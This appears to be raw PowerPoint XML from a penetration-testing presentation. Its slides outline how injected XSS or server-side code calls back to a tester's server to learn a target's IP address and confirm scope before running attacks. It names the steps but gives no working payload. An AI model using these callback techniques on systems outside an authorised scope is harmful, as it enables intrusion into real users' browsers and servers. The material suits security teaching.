          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="2057400" y="4635500"/>
            <a:ext cx="1676400" cy="530225"/>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1. Inject XSS code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4112" name="Freeform 66"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6438900" y="3797300"/>
            <a:ext cx="571500" cy="1003300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 360"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 632"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 360"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 632"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 360"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 632"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 360"/>
              <a:gd name="T10" fmla="*/ 0 h 632"/>
              <a:gd name="T11" fmla="*/ 360 w 360"/>
              <a:gd name="T12" fmla="*/ 632 h 632"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="360" h="632">
                <a:moveTo>
                  <a:pt x="360" y="584"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="292"/>
                  <a:pt x="48" y="0"/>
                  <a:pt x="24" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16"/>
                  <a:pt x="108" y="324"/>
                  <a:pt x="216" y="632"/>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4113" name="Text Box 67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="6781800" y="4038600"/>
            <a:ext cx="1676400" cy="530225"/>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2. Fetch XSS code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4114" name="Text Box 68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="4748213" y="5000625"/>
            <a:ext cx="1676400" cy="74295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3. Run XSS… fetch MyAddress.class</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4115" name="Freeform 69"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="3517900"/>
            <a:ext cx="3810000" cy="1739900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 2400"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 1096"/>
              <a:gd name="T2" fmla="*/ 0 w 2400"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1096"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 2400"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 1096"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2400"/>
              <a:gd name="T10" fmla="*/ 0 h 1096"/>
              <a:gd name="T11" fmla="*/ 2400 w 2400"/>
              <a:gd name="T12" fmla="*/ 1096 h 1096"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2400" h="1096">
                <a:moveTo>
                  <a:pt x="2400" y="856"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1200" y="428"/>
                  <a:pt x="0" y="0"/>
                  <a:pt x="0" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="80"/>
                  <a:pt x="1200" y="588"/>
                  <a:pt x="2400" y="1096"/>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4116" name="Text Box 70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="7391400" y="5187950"/>
            <a:ext cx="1676400" cy="1381125"/>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4. Look at MyAddress.class results.  Run attack … if browser in scope</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a:xfrm>
            <a:off x="685800" y="131060"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>2) Client-side Code with Pen Tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s Server Identifying IP Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5127" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="304800" y="1270000"/>
            <a:ext cx="8610600" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>XSS code is injected into web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Runs on target browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JavaScript calls pen tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s server code to determine access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5122" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6553200" y="4699000"/>
          <a:ext cx="857250" cy="898525"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s291983" name="Clip" r:id="rId4" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="3135086" imgH="3278319"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699000"/>
                        <a:ext cx="857250" cy="8985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5837238" y="3189288"/>
          <a:ext cx="862012" cy="900112"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s291984" name="Clip" r:id="rId6" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="3135086" imgH="3278319" progId="">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7238" y="3189288"/>
                        <a:ext cx="862012"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5128" name="Group 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="4318000"/>
            <a:ext cx="885825" cy="1301750"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="5125" name="Object 5"/>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91985" name="Clip" r:id="rId7" imgW="3135086" imgH="3278319" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId7" imgW="3135086" imgH="3278319"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5167" name="Rectangle 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5168" name="Group 9"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5169" name="Freeform 1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70" name="Freeform 1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71" name="Freeform 1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72" name="Freeform 1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73" name="Freeform 1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74" name="Freeform 1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75" name="Freeform 1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76" name="Freeform 1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77" name="Freeform 1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78" name="Freeform 1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79" name="Freeform 2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80" name="Freeform 2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81" name="Freeform 2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82" name="Freeform 2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83" name="Freeform 2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84" name="Freeform 2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85" name="Freeform 2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86" name="Freeform 2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87" name="Freeform 2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88" name="Freeform 2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89" name="Freeform 3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90" name="Freeform 3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91" name="Freeform 3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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5129" name="Group 33"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="3022600"/>
            <a:ext cx="885825" cy="1301750"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="5124" name="Object 4"/>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91986" name="Clip" r:id="rId8" imgW="3135086" imgH="3278319" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId8" imgW="3135086" imgH="3278319"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5142" name="Rectangle 35"/>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5143" name="Group 36"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5144" name="Freeform 37"/>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45" name="Freeform 38"/>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46" name="Freeform 39"/>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47" name="Freeform 40"/>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48" name="Freeform 41"/>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49" name="Freeform 42"/>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50" name="Freeform 43"/>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51" name="Freeform 44"/>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52" name="Freeform 45"/>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53" name="Freeform 46"/>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54" name="Freeform 47"/>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55" name="Freeform 48"/>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56" name="Freeform 49"/>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57" name="Freeform 50"/>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58" name="Freeform 51"/>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59" name="Freeform 52"/>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60" name="Freeform 53"/>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61" name="Freeform 54"/>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62" name="Freeform 55"/>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63" name="Freeform 56"/>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64" name="Freeform 57"/>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65" name="Freeform 58"/>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5166" name="Freeform 59"/>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5130" name="Text Box 60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7208838" y="4891088"/>
            <a:ext cx="8001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br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5131" name="Text Box 61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="4851400"/>
            <a:ext cx="6350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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Tester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5132" name="Text Box 62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6675438" y="3341688"/>
            <a:ext cx="1041400"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p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5133" name="Text Box 63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1273175" y="3443288"/>
            <a:ext cx="1089025"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 Tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5134" name="Freeform 64"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="965200" y="3784600"/>
            <a:ext cx="4978400" cy="1435100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 904"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 904"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 904"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T7" fmla="*/ 0 h 904"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 3136"/>
              <a:gd name="T13" fmla="*/ 0 h 904"/>
              <a:gd name="T14" fmla="*/ 3136 w 3136"/>
              <a:gd name="T15" fmla="*/ 904 h 904"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="3136" h="904">
                <a:moveTo>
                  <a:pt x="208" y="816"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="860"/>
                  <a:pt x="0" y="904"/>
                  <a:pt x="256" y="816"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="512" y="728"/>
                  <a:pt x="1264" y="424"/>
                  <a:pt x="1744" y="288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2224" y="152"/>
                  <a:pt x="2680" y="76"/>
                  <a:pt x="3136" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="accent2"/>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5135" name="Text Box 65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="2057400" y="4762500"/>
            <a:ext cx="1676400" cy="530225"/>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1. Inject XSS code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5136" name="Freeform 66"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6438900" y="3924300"/>
            <a:ext cx="571500" cy="1003300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 360"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 632"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 360"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 632"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 360"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 632"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 360"/>
              <a:gd name="T10" fmla="*/ 0 h 632"/>
              <a:gd name="T11" fmla="*/ 360 w 360"/>
              <a:gd name="T12" fmla="*/ 632 h 632"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="360" h="632">
                <a:moveTo>
                  <a:pt x="360" y="584"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="292"/>
                  <a:pt x="48" y="0"/>
                  <a:pt x="24" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16"/>
                  <a:pt x="108" y="324"/>
                  <a:pt x="216" y="632"/>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5137" name="Text Box 67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="6781800" y="4165600"/>
            <a:ext cx="1676400" cy="530225"/>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2. Fetch XSS code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5138" name="Text Box 68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="4762500" y="5070475"/>
            <a:ext cx="1676400" cy="116840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3. Run XSS… access some PHP page on pen tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" b="1" dirty="0"/>
              <a:t>'s server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5139" name="Freeform 69"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="3644900"/>
            <a:ext cx="3810000" cy="1739900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 2400"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 1096"/>
              <a:gd name="T2" fmla="*/ 0 w 2400"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1096"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 2400"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 1096"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2400"/>
              <a:gd name="T10" fmla="*/ 0 h 1096"/>
              <a:gd name="T11" fmla="*/ 2400 w 2400"/>
              <a:gd name="T12" fmla="*/ 1096 h 1096"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2400" h="1096">
                <a:moveTo>
                  <a:pt x="2400" y="856"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1200" y="428"/>
                  <a:pt x="0" y="0"/>
                  <a:pt x="0" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="80"/>
                  <a:pt x="1200" y="588"/>
                  <a:pt x="2400" y="1096"/>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5140" name="Text Box 70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="7391400" y="5314950"/>
            <a:ext cx="1676400" cy="138430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5. Look at response from server code.  Run Attack … if browser in scope.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5141" name="Text Box 71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="3048000" y="2794000"/>
            <a:ext cx="2209800" cy="74295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4. Server formulates response with IP addr of client that it sees</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0" y="-59960"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>3) Server-Side Code on Target Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6151" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="304800" y="838200"/>
            <a:ext cx="8763000" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Code is loaded onto victim server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>PHP, ASP, CFM, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Injected content loads page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Via IFRAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Server-side code determines client address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6146" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6553200" y="5057775"/>
          <a:ext cx="857250" cy="898525"/>
        </p:xfrm>
